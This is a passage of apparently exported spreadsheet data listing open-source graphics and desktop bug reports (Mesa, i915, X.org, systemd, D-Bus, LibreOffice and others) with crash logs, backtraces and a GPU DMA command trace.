	NVDmaNext: @0x00000012  0x00000000
NVDmaStart: subc=4 cmd=304 num=3
	NVDmaNext: @0x00000013  0x000c8304
	NVDmaNext: @0x00000014  0x00000002
	NVDmaNext: @0x00000015  0x00000000
	NVDmaNext: @0x00000016  0x00000001
NVDmaStart: subc=3 cmd=0 num=1
	NVDmaNext: @0x00000017  0x00046000
	NVDmaNext: @0x00000018  0x80000011
NVDmaStart: subc=3 cmd=180 num=1
	NVDmaNext: @0x00000019  0x00046180
	NVDmaNext: @0x0000001a  0x00000000
NVDmaStart: subc=1 cmd=0 num=1
	NVDmaNext: @0x0000001b  0x00042000
	NVDmaNext: @0x0000001c  0x80000016
NVDmaStart: subc=1 cmd=180 num=1
	NVDmaNext: @0x0000001d  0x00042180
	NVDmaNext: @0x0000001e  0xd8000003
NVDmaStart: subc=1 cmd=184 num=1
	NVDmaNext: @0x0000001f  0x00042184
	NVDmaNext: @0x00000020  0x00000000
NVDmaStart: subc=1 cmd=198 num=1
	NVDmaNext: @0x00000021  0x00042198
	NVDmaNext: @0x00000022  0x80000010
NVDmaStart: subc=1 cmd=18c num=1
	NVDmaNext: @0x00000023  0x0004218c
	NVDmaNext: @0x00000024  0x80000011
NVDmaStart: subc=1 cmd=188 num=1
	NVDmaNext: @0x00000025  0x00042188
	NVDmaNext: @0x00000026  0x80000012
NVDmaStart: subc=1 cmd=2fc num=1
	NVDmaNext: @0x00000027  0x000422fc
	NVDmaNext: @0x00000028  0x00000001
NVDmaStart: subc=5 cmd=0 num=1
	NVDmaNext: @0x00000029  0x0004a000
	NVDmaNext: @0x0000002a  0x80000015
NVDmaStart: subc=5 cmd=180 num=1
	NVDmaNext: @0x0000002b  0x0004a180
	NVDmaNext: @0x0000002c  0xd8000003
NVDmaStart: subc=5 cmd=184 num=1
	NVDmaNext: @0x0000002d  0x0004a184
	NVDmaNext: @0x0000002e  0x00000000
NVDmaStart: subc=5 cmd=19c num=1
	NVDmaNext: @0x0000002f  0x0004a19c
	NVDmaNext: @0x00000030  0x80000010
NVDmaStart: subc=5 cmd=188 num=3
	NVDmaNext: @0x00000031  0x000ca188
	NVDmaNext: @0x00000032  0x00000000
	NVDmaNext: @0x00000033  0x80000012
	NVDmaNext: @0x00000034  0x80000011
NVDmaStart: subc=5 cmd=2fc num=1
	NVDmaNext: @0x00000035  0x0004a2fc
	NVDmaNext: @0x00000036  0x00000001
NVDmaStart: subc=2 cmd=0 num=1
	NVDmaNext: @0x00000037  0x00044000
	NVDmaNext: @0x00000038  0x80000017
NVDmaStart: subc=2 cmd=180 num=1
	NVDmaNext: @0x00000039  0x00044180
	NVDmaNext: @0x0000003a  0xd8000003
NVDmaStart: subc=2 cmd=184 num=1
	NVDmaNext: @0x0000003b  0x00044184
	NVDmaNext: @0x0000003c  0xd8000001
NVDmaStart: subc=2 cmd=198 num=1
	NVDmaNext: @0x0000003d  0x00044198
	NVDmaNext: @0x0000003e  0x80000010
NVDmaStart: subc=2 cmd=188 num=1
	NVDmaNext: @0x0000003f  0x00044188
	NVDmaNext: @0x00000040  0x00000000
NVDmaStart: subc=2 cmd=18c num=1
	NVDmaNext: @0x00000041  0x0004418c
	NVDmaNext: @0x00000042  0x00000000
NVDmaStart: subc=2 cmd=190 num=1
	NVDmaNext: @0x00000043  0x00044190
	NVDmaNext: @0x00000044  0x00000000
NVDmaStart: subc=2 cmd=194 num=1
	NVDmaNext: @0x00000045  0x00044194
	NVDmaNext: @0x00000046  0x00000000
NVDmaStart: subc=2 cmd=304 num=1
	NVDmaNext: @0x00000047  0x00044304
	NVDmaNext: @0x00000048  0x00000003
NVDmaStart: subc=6 cmd=0 num=1
	NVDmaNext: @0x00000049  0x0004c000
	NVDmaNext: @0x0000004a  0x80000013
NVDmaStart: subc=6 cmd=180 num=1
	NVDmaNext: @0x0000004b  0x0004c180
	NVDmaNext: @0x0000004c  0x00000000
NVDmaStart: subc=7 cmd=0 num=1
	NVDmaNext: @0x0000004d  0x0004e000
	NVDmaNext: @0x0000004e  0x80000014
NVDmaStart: subc=7 cmd=184 num=3
	NVDmaNext: @0x0000004f  0x000ce184
	NVDmaNext: @0x00000050  0x80000013
	NVDmaNext: @0x00000051  0x80000012
	NVDmaNext: @0x00000052  0x80000011
NVDmaStart: subc=7 cmd=198 num=1
	NVDmaNext: @0x00000053  0x0004e198
	NVDmaNext: @0x00000054  0x80000010
NVDmaStart: subc=7 cmd=2fc num=1
	NVDmaNext: @0x00000055  0x0004e2fc
	NVDmaNext: @0x00000056  0x00000001
NVDmaStart: subc=6 cmd=0 num=1
	NVDmaNext: @0x00000057  0x0004c000
	NVDmaNext: @0x00000058  0x80000018
NVDmaStart: subc=6 cmd=180 num=1
	NVDmaNext: @0x00000059  0x0004c180
	NVDmaNext: @0x0000005a  0xd8000003
NVDmaStart: subc=6 cmd=184 num=2
	NVDmaNext: @0x0000005b  0x0008c184
	NVDmaNext: @0x0000005c  0xd8000001
	NVDmaNext: @0x0000005d  0xd8000001
	NVDmaNext: @0x00000000  0x00000000
	NVDmaNext: @0x00000001  0x00000000
	NVDmaNext: @0x00000002  0x00000000
	NVDmaNext: @0x00000003  0x00000000
	NVDmaNext: @0x00000004  0x00000000
	NVDmaNext: @0x00000005  0x00000000
	NVDmaNext: @0x00000006  0x00000000
	NVDmaNext: @0x00000007  0x00000000
NVDmaStart: subc=0 cmd=0 num=1
	NVDmaNext: @0x00000008  0x00040000
	NVDmaNext: @0x00000009  0x80000010
NVDmaStart: subc=0 cmd=180 num=1
	NVDmaNext: @0x0000000a  0x00040180
	NVDmaNext: @0x0000000b  0x00000000
NVDmaStart: subc=0 cmd=184 num=2
	NVDmaNext: @0x0000000c  0x00080184
	NVDmaNext: @0x0000000d  0xd8000001
	NVDmaNext: @0x0000000e  0xd8000001
NVDmaStart: subc=4 cmd=0 num=1
	NVDmaNext: @0x0000000f  0x00048000
	NVDmaNext: @0x00000010  0x80000012
NVDmaStart: subc=4 cmd=180 num=1
	NVDmaNext: @0x00000011  0x00048180
	NVDmaNext: @0x00000012  0x00000000
NVDmaStart: subc=4 cmd=304 num=3
	NVDmaNext: @0x00000013  0x000c8304
	NVDmaNext: @0x00000014  0x00000002
	NVDmaNext: @0x00000015  0x00000000
	NVDmaNext: @0x00000016  0x00000001
NVDmaStart: subc=3 cmd=0 num=1
	NVDmaNext: @0x00000017  0x00046000
	NVDmaNext: @0x00000018  0x80000011
NVDmaStart: subc=3 cmd=180 num=1
	NVDmaNext: @0x00000019  0x00046180
	NVDmaNext: @0x0000001a  0x00000000
NVDmaStart: subc=1 cmd=0 num=1
	NVDmaNext: @0x0000001b  0x00042000
	NVDmaNext: @0x0000001c  0x80000016
NVDmaStart: subc=1 cmd=180 num=1
	NVDmaNext: @0x0000001d  0x00042180
	NVDmaNext: @0x0000001e  0xd8000003
NVDmaStart: subc=1 cmd=184 num=1
	NVDmaNext: @0x0000001f  0x00042184
	NVDmaNext: @0x00000020  0x00000000
NVDmaStart: subc=1 cmd=198 num=1
	NVDmaNext: @0x00000021  0x00042198
	NVDmaNext: @0x00000022  0x80000010
NVDmaStart: subc=1 cmd=18c num=1
	NVDmaNext: @0x00000023  0x0004218c
	NVDmaNext: @0x00000024  0x80000011
NVDmaStart: subc=1 cmd=188 num=1
	NVDmaNext: @0x00000025  0x00042188
	NVDmaNext: @0x00000026  0x80000012
NVDmaStart: subc=1 cmd=2fc num=1
	NVDmaNext: @0x00000027  0x000422fc
	NVDmaNext: @0x00000028  0x00000001
NVDmaStart: subc=5 cmd=0 num=1
	NVDmaNext: @0x00000029  0x0004a000
	NVDmaNext: @0x0000002a  0x80000015
</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-584</t>
  </si>
  <si>
    <t>Missing MIME type for audio/x-m4a</t>
  </si>
  <si>
    <t>freedesktop.org.xml.in does not contain a MIME type for audo/x-m4a -- this is an
easy fix. Attaching a patch.</t>
  </si>
  <si>
    <t>peter+freedesktopbugzilla</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-85489</t>
  </si>
  <si>
    <t>missing names for xkb_symbols sections in fujitsu_vndr/*</t>
  </si>
  <si>
    <t>Created attachment 108467
fujitsu_vndr: add a name to xkb_symbols sections
This was reported as https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=749006
Apparently these two files are the only ones with unnamed xkb_symbols sections.  Could you consider something like the attached patch?</t>
  </si>
  <si>
    <t>DRI-109490</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@kms_busy@basic-modeset-[abc] - fail - Failed assertion: ret == 0 Failed assertion: nanosleep(&amp;tv NULL) == -1</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5498/shard-kbl6/igt@kms_busy@basic-modeset-a.html
Starting subtest: basic-modeset-A
(kms_busy:1081) igt_kms-CRITICAL: Test assertion failure function igt_display_commit_atomic file ../lib/igt_kms.c:3405:
(kms_busy:1081) igt_kms-CRITICAL: Failed assertion: ret == 0
(kms_busy:1081) igt_kms-CRITICAL: Last errno: 22 Invalid argument
(kms_busy:1081) igt_kms-CRITICAL: error: -22 != 0
(kms_busy:1080) CRITICAL: Test assertion failure function flip_to_fb file ../tests/kms_busy.c:125:
(kms_busy:1080) CRITICAL: Failed assertion: nanosleep(&amp;tv NULL) == -1
(kms_busy:1080) CRITICAL: flip to fb[0] blocked waiting for busy fbSubtest basic-modeset-A failed.</t>
  </si>
  <si>
    <t>XORG-12467</t>
  </si>
  <si>
    <t>RV350 (Mobility M10) produces garbled output with X.org 7.3</t>
  </si>
  <si>
    <t>After upgrading from X.org 7.2 to 7.3 my laptop's Radeon Mobility M10 shows garbled fast changing patterns instead of the actual screen contents on the internal LCD.
The laptop is a Dell Inspiron 8600C with a 15.4 1920x100 LCD running FreeBSD 6-STABLE. I have experimented both with driver version 6.7.192 included in X.org 7.3 and the driver from git HEAD. Both lead to corrupt display while the driver from X.org 7.2 works fine.
I have tracked this problem down to git commit 62f06d89da3f7160d5e4df8d7ce6fe1a94e9d07c. If I revert that commit both the 7.3 driver and git HEAD produce correct output. Right now I am running driver version 6.7.192 with that one commit reverted.
Simply reverting a commit I know nothing about is not a solution of course but it seems to work around some bug introduced with that change.</t>
  </si>
  <si>
    <t>freebsd</t>
  </si>
  <si>
    <t>SYSTEMD-80556</t>
  </si>
  <si>
    <t>networkd fails assertion on tap device going away</t>
  </si>
  <si>
    <t>Created attachment 101800
bt full
I can semi-reliably hit a failed assertion when shutting down a VM:
tap0            : link 41 added
tap0            : udev initializing link...
tap0            : flags change: +MULTICAST +BROADCAST
tap0            : MAC address: fe:8d:25:75:f8:a1
br-qemu         : MAC address: fe:8d:25:75:f8:a1
tap0            : flags change: +UP +LOWER_UP +RUNNING
tap0            : gained carrier
br-qemu         : flags change: +LOWER_UP +RUNNING
br-qemu         : gained carrier
sd-rtnl: discarding 20 bytes of incoming message
tap0            : added address: fe80::fc8d:25ff:fe75:f8a1/64
tap0            : udev initialized link
tap0            : link state is up-to-date
tap0            : unmanaged
tap0            : flags change: -UP -LOWER_UP -RUNNING
tap0            : removed address: fe80::fc8d:25ff:fe75:f8a1/64
tap0            : link removed
tap0            : link 41 added
tap0            : could not find udev device
could not add new link
br-qemu         : MAC address: 00:00:00:00:00:00
br-qemu         : flags change: -LOWER_UP
tap0            : link removed
br-qemu         : flags change: -RUNNING
br-qemu         : lost carrier
sd-rtnl: discarding 20 bytes of incoming message
Assertion 'm' failed at src/network/networkd-link.c:2029 function link_rtnl_process_address(). Aborting.
The KVM is given a bridge device:
# /etc/systemd/network/br-qemu.netdev
[NetDev]
Name=br-qemu
Kind=bridge
# /etc/systemd/network/br-qemu.network
[Match]
Name=br-qemu
[Network]
Description=Qemu vlan
Address=10.0.2.1/24
Address=2001:470:736c:107::1/64
And is started with args: -netdev bridgebr=br-qemuid=mynet0 -device virtio-netnetdev=mynet0mac=de:ad:be:ef:00:07
I've bisected this breakage to fbbeb65a93e2f90f6576001b. Backtrace attached. It's likely a race condition somewhere -- the SIGABRT sometimes turns into a SIGSEGV when I set SYSTEMD_LOG_LEVEL=debug.</t>
  </si>
  <si>
    <t>TELEPATHY-15306</t>
  </si>
  <si>
    <t>Crash when GetInterfaces() fails</t>
  </si>
  <si>
    <t>When joining a chatroom gabble crash (bug #15198) and it produce an assert in tp-glib so empathy crash:
** tp-glib:ERROR:(connection.c:185):tp_connection_continue_introspection: assertion failed: (self-&gt;priv-&gt;introspect_needed != NULL)
Program received signal SIGABRT Aborted.
[Switching to Thread 0x7f361ae187c0 (LWP 23750)]
0x00007f36154ea0e5 in raise () from /lib/libc.so.6
(gdb) bt
#0  0x00007f36154ea0e5 in raise () from /lib/libc.so.6
#1  0x00007f36154ebb40 in abort () from /lib/libc.so.6
#2  0x00007f3615d63b17 in g_assertion_message () from /usr/lib/libglib-2.0.so.0
#3  0x00007f3615d63fb2 in g_assertion_message_expr () from /usr/lib/libglib-2.0.so.0
#4  0x00007f3619c8dccd in tp_connection_continue_introspection (self=0xb2e820) at connection.c:185
#5  0x00007f3619c8dd39 in tp_connection_got_interfaces_cb (self=0xb2e820 interfaces=0x0 error= user_data= 
    user_object=) at connection.c:304
#6  0x00007f3619c97f77 in _tp_cli_connection_invoke_callback_get_interfaces (self=0xb2e820 error=0x6 args=0x0 
    generic_callback=0x7f3619c8dcd0  user_data=0x0 weak_object=0x0) at _gen/tp-cli-connection-body.h:778
#7  0x00007f3619cb6e3e in tp_proxy_pending_call_idle_invoke (p=) at proxy.c:695
#8  0x00007f3615d41222 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#9  0x00007f3615d444d6 in ?? () from /usr/lib/libglib-2.0.so.0
#10 0x00007f3615d44797 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#11 0x00007f3619078ee3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#12 0x000000000040bdad in main (argc=1 argv=0x7fff22e582a8) at empathy.c:449</t>
  </si>
  <si>
    <t>DBUS-26427</t>
  </si>
  <si>
    <t>Eavesdroppers don't receive method calls dispatched to just-activated services</t>
  </si>
  <si>
    <t>I was hunting for a bug involving the arguments passed to RequestConnection() which is the method that generally activates the CM. Strangely `dbus-monitor member='RequestConnection'` produced no output and yet the connection was certainly being requested.
A bit of hair-tearing later I discovered that if I started the CM by hand before trying to request a connection the method call was delivered to the minotaur correctly. So I think this is a daemon bug.</t>
  </si>
  <si>
    <t>XORG-11721</t>
  </si>
  <si>
    <t>32bits framebuffer and Xfbdev</t>
  </si>
  <si>
    <t>Hello
I was trying to install Xfbdev (from Xorg-server-1.2.0) on a 32-bits framebuffer with 8 bits masks for each channel. It is due to hardware specification.
31..24 -&gt; b
23..16 -&gt; g
15..8 -&gt; r
7..0 -&gt; a
I didn't have any problem at install but a Segfault while building colormap at execution.
Indeed in fbdev.c we can see a bloc #ifdef FBDEV_KLUDGE_FORMAT which modifies color masks (especially for red where mask becomes 0xFFFF instead of OxFF00).
This modification implies an out of memory acces in dix/colormap.c around line 313. The 'size' value which should be red depth (ie 256) is 65536 because of previous modification.
If a delete the block between #ifdef FBDEV_KLUDGE_FORMAT output initialization goes on successfully but I got a SegFault in Xrender (as explained in fbdev.c)
It seems to be a real incompatibility with 32bits framebuffers with alpha channel on low-bits but I don't have time to study Xrender and submit a patch.
Sorry and thank you!</t>
  </si>
  <si>
    <t>MESA-105567</t>
  </si>
  <si>
    <t>meson/ninja: 1. mesa/vdpau incorrect symlinks in DESTDIR and 2. Ddri-drivers-path Dvdpau-libs-path overrides DESTDIR</t>
  </si>
  <si>
    <t>A meson/ninja install using option -Ddri-drivers-path overrides the DESTDIR variable and install to the path specified by -Ddri-drivers-path. Therefore files don't get packaged or logged with the files that do get installed to DESTDIR.
The above behaviour differs from an autotools build and install in which --with-dri-driverdir does not override DESTDIR.
Slackware installs dri modules in /usr/lib64/xorg/modules/dri.
Leaving -Ddri-drivers-path to the default value allows DRI drivers to be installed in the DESTDIR directory but then xorg-server will need to be recompiled to find the new DRI driver location.
Meson/ninja installing vdpau libraries (two bugs in one):
1.Symlink bug
If using DESTDIR variable WITHOUT -Dvdpau-libs-path then the symlinks libvdpau_radeonsi.so.1.0 libvdpau_radeonsi.so.1 libvdpau_radeonsi.so incorrectly point to ${DESTDIR}/lib64/vdpau/libvdpau_radeonsi.so.1.0.0 and not /usr/lib64/vdpau/vdpau_radeonsi.so.1.0.0.  Autotools building would have symlinked to /usr/lib64/vdpau/vdpau_radeonsi.so.1.0.0 when installing to DESTDIR.
2. DESTDIR bug/meson feature
If using DESTDIR variable WITH -Dvdpau-libs-path then all vdpau related files and symlinks install to /usr/lib64/vdpau/. Symlinks correctly point to /usr/lib64/vdpau/libvdpau_radeonsi.so.1.0.0. If installing in this manner then files and links cannot be packaged or logged with other files that do install to DESTDIR.</t>
  </si>
  <si>
    <t>bug0xa3d2</t>
  </si>
  <si>
    <t>DRI-80123</t>
  </si>
  <si>
    <t>[HSW/BDW Bisected]igt/drv_suspend and kms_flip causes  WARNING: CPU: 5 PID: 4253 at drivers/gpu/drm/i915/intel_display.c:7305 hsw_enable_pc8+0xeb/0x54d [i915]() sporadically</t>
  </si>
  <si>
    <t>Created attachment 101211
dmesg
==System Environment==
--------------------------
Regression: Yes. 
This bug only find on -nightly branch. The fail rate about 1 out of 3.
Non-working platforms: HSW
==kernel==
--------------------------
origin/drm-intel-nightly: e9ce9f961282205b5954a0da4e48e96884190a77(fails)
    drm-intel-nightly: 2014y-06m-16d-21h-22m-19s integration manifest
origin/drm-intel-next-queued: 8c0f92e1f87149bd2429015c9d0600a13a34d607(tried 5 times didn't find this issue)
    drm/i915: Fix comment about our plane remapping on gen2/3
origin/drm-intel-fixes: 223a6f2b975ab35d93270ea1d4fb6e0ac6b27fe6(tried 5 times didn't find this issue)
    drm/i915/bdw: remove erroneous chv specific workarounds from bdw code
==Bug detailed description==
-----------------------------
igt/kms_flip causes WARNING: CPU: 5 PID: 4368 at drivers/gpu/drm/i915/intel_pm.c:6174 check_power_well_state+0x69/0x6f [i915]()
Case list:
igt/kms_flip/vblank-vs-dpms-suspend
igt/kms_flip/vblank-vs-dpms-suspend-interruptible
igt/kms_flip/vblank-vs-modeset-suspend
igt/kms_flip/vblank-vs-modeset-suspend-interruptible
igt/kms_flip/vblank-vs-suspend
igt/kms_flip/vblank-vs-suspend-interruptible
Output:
[root@x-hsw26 tests]# ./kms_flip --run-subtest vblank-vs-dpms-suspend
IGT-Version: 1.7-gd123de6 (x86_64) (Linux: 3.15.0-rc8_drm-intel-nightly_e9ce9f_20140617+ x86_64)
Using monotonic timestamps
Beginning vblank-vs-dpms-suspend on crtc 6 connector 25
  1920x1080 60 1920 2008 2052 2200 1080 1082 1087 1125 0x5 0x48 148500
.rtcwake: wakeup from mem using /dev/rtc0 at Tue Jun 17 21:28:21 2014
.rtcwake: wakeup from mem using /dev/rtc0 at Tue Jun 17 21:28:54 2014
vblank-vs-dpms-suspend on crtc 6 connector 25: PASSED
Beginning vblank-vs-dpms-suspend on crtc 10 connector 25
  1920x1080 60 1920 2008 2052 2200 1080 1082 1087 1125 0x5 0x48 148500
.rtcwake: wakeup from mem using /dev/rtc0 at Tue Jun 17 21:29:27 2014
.rtcwake: wakeup from mem using /dev/rtc0 at Tue Jun 17 21:30:00 2014
vblank-vs-dpms-suspend on crtc 10 connector 25: PASSED
Beginning vblank-vs-dpms-suspend on crtc 14 connector 25
  1920x1080 60 1920 2008 2052 2200 1080 1082 1087 1125 0x5 0x48 148500
.rtcwake: wakeup from mem using /dev/rtc0 at Tue Jun 17 21:30:33 2014
.rtcwake: wakeup from mem using /dev/rtc0 at Tue Jun 17 21:31:06 2014
vblank-vs-dpms-suspend on crtc 14 connector 25: PASSED
Subtest vblank-vs-dpms-suspend: SUCCESS
DMESG shows:
[  101.492242] WARNING: CPU: 5 PID: 4253 at drivers/gpu/drm/i915/intel_display.c:7305 hsw_enable_pc8+0xeb/0x54d [i915]()
[  101.492242] Power well on
[  101.492249] Modules linked in: dm_mod snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi iTCO_wdt iTCO_vendor_support pcspkr serio_raw i2c_i801 firewire_ohci lpc_ich mfd_core snd_hda_intel snd_hda_controller firewire_core crc_itu_t snd_hda_codec snd_hwdep snd_pcm snd_timer snd soundcore battery wmi acpi_cpufreq i915 video button drm_kms_helper drm
[  101.492250] CPU: 5 PID: 4253 Comm: kworker/u16:45 Tainted: G        W     3.15.0-rc8_drm-intel-nightly_e9ce9f_20140617+ #3634
[  101.492251] Hardware name:                  /DZ87KLT75K BIOS KLZ8711D.86A.0336.2013.0516.1957 05/16/2013
[  101.492254] Workqueue: events_unbound async_run_entry_fn
[  101.492255]  0000000000000000 0000000000000009 ffffffff81772bca ffff880250183cd8
[  101.492256]  ffffffff81036e54 0000000000000246 ffffffffa00aca76 000000000000020c
[  101.492257]  ffff880002c50000 ffff880250c48360 ffff880250c48368 0000000000000000
[  101.492257] Call Trace:
[  101.492260]  [] ? dump_stack+0x41/0x51
[  101.492263]  [] ? warn_slowpath_common+0x78/0x90
[  101.492268]  [] ? hsw_enable_pc8+0xeb/0x54d [i915]
[  101.492269]  [] ? warn_slowpath_fmt+0x45/0x4a
[  101.492274]  [] ? hsw_enable_pc8+0xeb/0x54d [i915]
[  101.492278]  [] ? i915_pm_thaw_early+0xd/0xd [i915]
[  101.492281]  [] ? i915_pm_suspend_late+0x30/0x49 [i915]
[  101.492283]  [] ? dpm_run_callback+0x30/0x6b
[  101.492285]  [] ? __device_suspend_late+0x12d/0x15d
[  101.492286]  [] ? async_suspend_late+0x17/0x7f
[  101.492287]  [] ? async_run_entry_fn+0xd9/0x10b
[  101.492287]  [] ? async_run_entry_fn+0x55/0x10b
[  101.492289]  [] ? process_one_work+0x1e2/0x363
[  101.492291]  [] ? worker_thread+0x1c7/0x2bc
[  101.492292]  [] ? manage_workers.isra.23+0x1b5/0x1b5
[  101.492293]  [] ? kthread+0xc5/0xcd
[  101.492295]  [] ? kthread_freezable_should_stop+0x40/0x40
[  101.492296]  [] ? ret_from_fork+0x7c/0xb0
[  101.492297]  [] ? kthread_freezable_should_stop+0x40/0x40
[  101.492298] ---[ end trace 366fcbad8095cbf0 ]---
[  101.492299] ------------[ cut here ]------------
[  101.492303] WARNING: CPU: 5 PID: 4253 at drivers/gpu/drm/i915/intel_display.c:7307 hsw_enable_pc8+0x131/0x54d [i915]()
[  101.492303] WRPLL1 enabled
[  101.492309] Modules linked in: dm_mod snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi iTCO_wdt iTCO_vendor_support pcspkr serio_raw i2c_i801 firewire_ohci lpc_ich mfd_core snd_hda_intel snd_hda_controller firewire_core crc_itu_t snd_hda_codec snd_hwdep snd_pcm snd_timer snd soundcore battery wmi acpi_cpufreq i915 video button drm_kms_helper drm
[  101.492310] CPU: 5 PID: 4253 Comm: kworker/u16:45 Tainted: G        W     3.15.0-rc8_drm-intel-nightly_e9ce9f_20140617+ #3634
[  101.492310] Hardware name:                  /DZ87KLT75K BIOS KLZ8711D.86A.0336.2013.0516.1957 05/16/2013
[  101.492311] Workqueue: events_unbound async_run_entry_fn
[  101.492312]  0000000000000000 0000000000000009 ffffffff81772bca ffff880250183cd8
[  101.492313]  ffffffff81036e54 0000000000000246 ffffffffa00acabc 000000000000020c
[  101.492313]  ffff880002c50000 ffff880250c48360 ffff880250c48368 0000000000000000
[  101.492314] Call Trace:
[  101.492315]  [] ? dump_stack+0x41/0x51
[  101.492316]  [] ? warn_slowpath_common+0x78/0x90
[  101.492320]  [] ? hsw_enable_pc8+0x131/0x54d [i915]
[  101.492321]  [] ? warn_slowpath_fmt+0x45/0x4a
[  101.492326]  [] ? hsw_enable_pc8+0x131/0x54d [i915]
[  101.492329]  [] ? i915_pm_thaw_early+0xd/0xd [i915]
[  101.492332]  [] ? i915_pm_suspend_late+0x30/0x49 [i915]
[  101.492333]  [] ? dpm_run_callback+0x30/0x6b
[  101.492335]  [] ? __device_suspend_late+0x12d/0x15d
[  101.492336]  [] ? async_suspend_late+0x17/0x7f
[  101.492337]  [] ? async_run_entry_fn+0xd9/0x10b
[  101.492338]  [] ? async_run_entry_fn+0x55/0x10b
[  101.492339]  [] ? process_one_work+0x1e2/0x363
[  101.492340]  [] ? worker_thread+0x1c7/0x2bc
[  101.492342]  [] ? manage_workers.isra.23+0x1b5/0x1b5
[  101.492342]  [] ? kthread+0xc5/0xcd
[  101.492344]  [] ? kthread_freezable_should_stop+0x40/0x40
[  101.492345]  [] ? ret_from_fork+0x7c/0xb0
[  101.492346]  [] ? kthread_freezable_should_stop+0x40/0x40
[  101.492346] ---[ end trace 366fcbad8095cbf1 ]---
[  101.492350] ------------[ cut here ]------------
[  101.492354] WARNING: CPU: 5 PID: 4253 at drivers/gpu/drm/i915/intel_display.c:7326 hsw_enable_pc8+0x29d/0x54d [i915]()
[  101.492355] IRQs enabled
[  101.492360] Modules linked in: dm_mod snd_hda_codec_realtek snd_hda_codec_generic snd_hda_codec_hdmi iTCO_wdt iTCO_vendor_support pcspkr serio_raw i2c_i801 firewire_ohci lpc_ich mfd_core snd_hda_intel snd_hda_controller firewire_core crc_itu_t snd_hda_codec snd_hwdep snd_pcm snd_timer snd soundcore battery wmi acpi_cpufreq i915 video button drm_kms_helper drm
[  101.492360] CPU: 5 PID: 4253 Comm: kworker/u16:45 Tainted: G        W     3.15.0-rc8_drm-intel-nightly_e9ce9f_20140617+ #3634
[  101.492361] Hardware name:                  /DZ87KLT75K BIOS KLZ8711D.86A.0336.2013.0516.1957 05/16/2013
[  101.492362] Workqueue: events_unbound async_run_entry_fn
[  101.492362]  0000000000000000 0000000000000009 ffffffff81772bca ffff880250183cd8
[  101.492363]  ffffffff81036e54 0000000000000246 ffffffffa00acc28 000000000000020c
[  101.492364]  ffff880002c50000 ffff880250c48360 ffff880250c48368 0000000000000000
[  101.492364] Call Trace:
[  101.492366]  [] ? dump_stack+0x41/0x51
[  101.492367]  [] ? warn_slowpath_common+0x78/0x90
[  101.492371]  [] ? hsw_enable_pc8+0x29d/0x54d [i915]
[  101.492372]  [] ? warn_slowpath_fmt+0x45/0x4a
[  101.492376]  [] ? hsw_enable_pc8+0x29d/0x54d [i915]
[  101.492379]  [] ? i915_pm_thaw_early+0xd/0xd [i915]
[  101.492383]  [] ? i915_pm_suspend_late+0x30/0x49 [i915]
[  101.492384]  [] ? dpm_run_callback+0x30/0x6b
[  101.492385]  [] ? __device_suspend_late+0x12d/0x15d
[  101.492386]  [] ? async_suspend_late+0x17/0x7f
[  101.492387]  [] ? async_run_entry_fn+0xd9/0x10b
[  101.492388]  [] ? async_run_entry_fn+0x55/0x10b
[  101.492389]  [] ? process_one_work+0x1e2/0x363
[  101.492390]  [] ? worker_thread+0x1c7/0x2bc
[  101.492391]  [] ? manage_workers.isra.23+0x1b5/0x1b5
[  101.492392]  [] ? kthread+0xc5/0xcd
[  101.492393]  [] ? kthread_freezable_should_stop+0x40/0x40
[  101.492394]  [] ? ret_from_fork+0x7c/0xb0
[  101.492395]  [] ? kthread_freezable_should_stop+0x40/0x40
==Reproduce steps==
---------------------------- 
1. ./kms_flip --run-subtest vblank-vs-dpms-suspend</t>
  </si>
  <si>
    <t>XORG-40541</t>
  </si>
  <si>
    <t>unable to handle kernel NULL pointer dereference at           (null)</t>
  </si>
  <si>
    <t>Created attachment 50801
Important parts of my logs.
I am getting the attached Errors since I am using kwin 4.7.0 with OpenGL-ES.
I am not sure if the following is related: When I am changing window sizes several times my memory gets filled up. The memory is not released by restarting kwin or X. When I filled my memory by doing this I do not have to wait long for the attached Error but I do not know what triggers it exactly.
Occasionally I also have thousands of messages of the following form in my logs:
Aug 08 18:06:09 [kernel] [ 3810.714471] [TTM] Failed to find memory space for buffer 0xffff8800bc392000 eviction.
Aug 08 18:06:09 [kernel] [ 3810.714476] [TTM] No space for ffff8800bc392000 (96 pages 384K 0M)
Aug 08 18:06:09 [kernel] [ 3810.714479] [TTM]   placement[0]=0x00070002 (1)
Aug 08 18:06:09 [kernel] [ 3810.714480] [TTM]     has_type: 1
Aug 08 18:06:09 [kernel] [ 3810.714482] [TTM]     use_type: 1
Aug 08 18:06:09 [kernel] [ 3810.714484] [TTM]     flags: 0x0000000A
Aug 08 18:06:09 [kernel] [ 3810.714485] [TTM]     gpu_offset: 0x00000000
Aug 08 18:06:09 [kernel] [ 3810.714487] [TTM]     size: 131072
Aug 08 18:06:09 [kernel] [ 3810.714489] [TTM]     available_caching: 0x00070000
Aug 08 18:06:09 [kernel] [ 3810.714491] [TTM]     default_caching: 0x00010000
This is the reason why I did not upload full logs (all in all 40MB). Nevertheless I can upload more logs if you wish so.
As you can see in the logs I have this problem since several kernel versions.
My graphics card: GeForce 8600 GT
Some version information (only applicable for the last logged crash):
sys-kernel/gentoo-sources-3.0.1
x11-base/xorg-x11-7.4-r1
x11-drivers/xf86-video-nouveau-0.0.16_pre20110801
x11-libs/libdrm-2.4.26
media-libs/mesa-7.11</t>
  </si>
  <si>
    <t>LIBREOFFICE-65222</t>
  </si>
  <si>
    <t>regression : color grid has no scroll bar : selecting a color is difficult/impossible</t>
  </si>
  <si>
    <t>Create a new document in Draw.
Create a shape (a rect).
Right clic on the shape select Area....
Select tab Colors.
The color grid has no scroll bar anymore.
With the default palette the UI is ok.
Click on the button Load color list and select another palette.
Problem : the rendering is very different because the height of each color is defined by the number of colors in the palette.
Visually it's awful.
On the usability point of view it's very difficult to select a color when the palette get bigger.
In one case (palette scribus which is the biggest) LO renders no colors =&gt; it's impossible to select a color.
Expected behavior : LO should render colors in a grid with constant height with a vertical scrollbar as it did in LO 3.x and 4.0.
The problem is also visible in preferences.</t>
